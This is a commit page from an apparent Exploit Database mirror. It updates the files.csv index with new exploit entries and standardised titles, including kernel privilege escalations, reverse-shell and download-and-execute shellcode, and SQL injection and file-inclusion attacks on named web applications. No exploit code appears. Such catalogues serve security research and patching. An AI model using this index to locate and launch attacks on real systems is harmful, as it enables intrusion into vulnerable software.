bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-08

Browse source 
12 new exploits

vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit
vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption

XChat - Heap Overflow Denial of Service
XChat 2.8.9 - Heap Overflow Denial of Service

Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)
Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)

glibc - getaddrinfo Stack Based Buffer Overflow (1)
glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)
Microsoft Edge - JSON.parse Info Leak
Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)
Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)
Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)
Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation

Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation

Microsoft PowerShell - XML External Entity Injection

XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'
XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)

Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap

glibc - getaddrinfo Stack Based Buffer Overflow (2)
glibc - 'getaddrinfo' Stack Based Buffer Overflow

Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)

Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)

Gravity Board X 1.1 - (csscontent) Remote Code Execution
Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution

Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion
Mambo Component ExtCalendar 2.0 - Remote File Inclusion

Mambo Component com_babackup 1.1 - File Inclusion
Mambo Component bigAPE-Backup 1.1 - File Inclusion

E-Smart Cart 1.0 - 'Product_ID' SQL Injection
E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection

Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion
Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion

Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion
Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion

Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion
Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion

Cartweaver - 'Details.cfm ProdID' SQL Injection
Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection

Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection
Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection

xeCMS 1.x - (view.php list) Remote File Disclosure
xeCMS 1.x - 'view.php' Remote File Disclosure

Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection
Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection

Easy-Clanpage 2.2 - 'id' SQL Injection
Easy-Clanpage 2.2 - 'id' Parameter SQL Injection
JAMM CMS - 'id' Blind SQL Injection
Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
JAMM CMS - 'id' Parameter Blind SQL Injection
Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection
Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection
Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting

Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection
Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection
Easy-Clanpage 3.0b1 - (section) Local File Inclusion
WebChamado 1.1 - (tsk_id) SQL Injection
Pre News Manager 1.0 - (index.php id) SQL Injection
Pre Ads Portal 2.0 - SQL Injection
Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion
WebChamado 1.1 - 'tsk_id' Parameter SQL Injection
Pre News Manager 1.0 - 'id' Parameter SQL Injection
Pre ADS Portal 2.0 - SQL Injection

GLLCTS2 - 'listing.php sort' Blind SQL Injection
GLLCTS2 - 'sort' Parameter Blind SQL Injection

Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting
PHPMyCart - 'shop.php cat' SQL Injection
SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion
Cartweaver 3 - (prodId) Blind SQL Injection
DIY - (index_topic did) Blind SQL Injection
PHPMyCart 1.3 - 'cat' Parameter SQL Injection
SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion
Cartweaver 3 - 'prodId' Parameter Blind SQL Injection
DIY - 'did' Parameter Blind SQL Injection
ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities
PHPEasyNews 1.13 RC2 - (POST) SQL Injection
ezcms 1.2 - Blind SQL Injection / Authentication Bypass
PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection

Devalcms 1.4a - (currentfile) Local File Inclusion
Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion

IPTBB 0.5.6 - (index.php act) Local File Inclusion
IPTBB 0.5.6 - 'act' Parameter Local File Inclusion

Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection
Mambo Component Articles - 'artid' Parameter Blind SQL Injection

Mambo Component 'com_n-gallery' - Multiple SQL Injections
Mambo Component N-Gallery - Multiple SQL Injections

devalcms 1.4a - Cross-Site Scripting / Remote Code Execution
Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution

PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection
PHP JOBWEBSITE PRO - Authentication Bypass

Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting

Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection
Mambo Component n-form - 'form_id' Parameter Blind SQL Injection

Pre Job Board - (Authentication Bypass) SQL Injection
Pre Job Board - Authentication Bypass

Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection
Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection

facil-cms 0.1rc2 - Multiple Vulnerabilities
Facil-CMS 0.1RC2 - Multiple Vulnerabilities

Family Connections CMS 1.9 - (member) SQL Injection
Family Connections CMS 1.9 - SQL Injection

Mambo Component 'com_hestar' - SQL Injection
Mambo Component Hestar - SQL Injection

Joomla! / Mambo Component 'com_tupinambis' - SQL Injection
Joomla! / Mambo Component Tupinambis - SQL Injection

Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion
Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion

Mambo Component 'com_materialsuche' 1.0 - SQL Injection
Mambo Component Material Suche 1.0 - SQL Injection

Pre ADS Portal - 'cid' SQL Injection
Pre ADS Portal - 'cid' Parameter SQL Injection

Pre News Manager - (nid) SQL Injection
Pre News Manager - 'nid' Parameter SQL Injection

Mambo Component 'com_akogallery' - SQL Injection
Mambo Component AkoGallery - SQL Injection

Mambo Component 'com_mambads' - SQL Injection
Mambo Component MambAds - SQL Injection

Facil-CMS - (Local File Inclusion / Remote File Inclusion)
Facil-CMS 0.1RC2 - Local / Remote File Inclusion

AskMe Pro 2.1 - (que_id) SQL Injection
Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection

Pre Job Board Pro - SQL Injection Authentication Bypass
Pre Job Board Pro - Authentication Bypass

DiY-CMS 1.0 - Multiple Remote File Inclusion
DIY-CMS 1.0 - Multiple Remote File Inclusion

Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection

Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection
Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection

Pre Ads Portal - SQL Bypass
Pre ADS Portal - Authentication Bypass

Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection
Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection

Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution
Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution

Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)
Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)

Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting

Clever Copy 3.0 - Connect.INC Information Disclosure
Clever Copy 3.0 - 'Connect.INC' Information Disclosure

Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection
Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion
Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion
Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion
Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion

Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion
Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion

Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion
Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion

Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection
Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection

Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection
Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection
Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection
Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection

Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection
Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection

Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection
Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection
PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection
PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting
PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection
PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting

Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection
Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection

Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass
PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass

Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection
Mambo Component Docman 1.3.0 - Multiple SQL Injection

Mambo Component 'com_n-skyrslur' - Cross-Site Scripting
Mambo Component N-Skyrslur - Cross-Site Scripting

Mambo Component 'com_n-gallery' - SQL Injection
Mambo Component N-Gallery - SQL Injection

Mambo Component 'com_n-press' - SQL Injection
Mambo Component N-Press - SQL Injection
Mambo Component 'com_n-frettir' - SQL Injection
Mambo Component 'com_n-myndir' - SQL Injection
Mambo Component N-Frettir - SQL Injection
Mambo Component N-Myndir - SQL Injection

AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
Edge SkateShop - Authentication bypass

AbanteCart 1.2.7 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2016-12-08 05:01:21 +00:00
parent 855e59f932
commit fb1dd3709f
19 changed files with 1351 additions and 151 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

192
files.csv
View file

@ -739,7 +739,7 @@ id,file,description,date,author,platform,type,port
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0
5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0
5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0
@ -2074,7 +2074,7 @@ id,file,description,date,author,platform,type,port
18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0
18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0
18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0
18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0
18159,platforms/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0
18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0
@ -4980,14 +4980,14 @@ id,file,description,date,author,platform,type,port
39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0
39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0
@ -5288,6 +5288,12 @@ id,file,description,date,author,platform,type,port
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0
40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0
40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6578,7 +6584,7 @@ id,file,description,date,author,platform,type,port
15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0
15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0
15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0
@ -6792,7 +6798,7 @@ id,file,description,date,author,platform,type,port
17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0
17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0
17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0
17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0
@ -8677,6 +8683,7 @@ id,file,description,date,author,platform,type,port
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9649,7 +9656,7 @@ id,file,description,date,author,platform,type,port
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0
5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0
5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0
5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0
@ -13292,6 +13299,7 @@ id,file,description,date,author,platform,type,port
26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0
26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0
26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0
40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0
26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0
26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0
@ -14353,7 +14361,7 @@ id,file,description,date,author,platform,type,port
34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0
34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0
34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0
40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0
40339,platforms/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote,0
34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0
34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466
@ -15129,6 +15137,7 @@ id,file,description,date,author,platform,type,port
40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15730,6 +15739,7 @@ id,file,description,date,author,platform,type,port
40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -15976,7 +15986,7 @@ id,file,description,date,author,platform,type,port
1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0
1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0
1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0
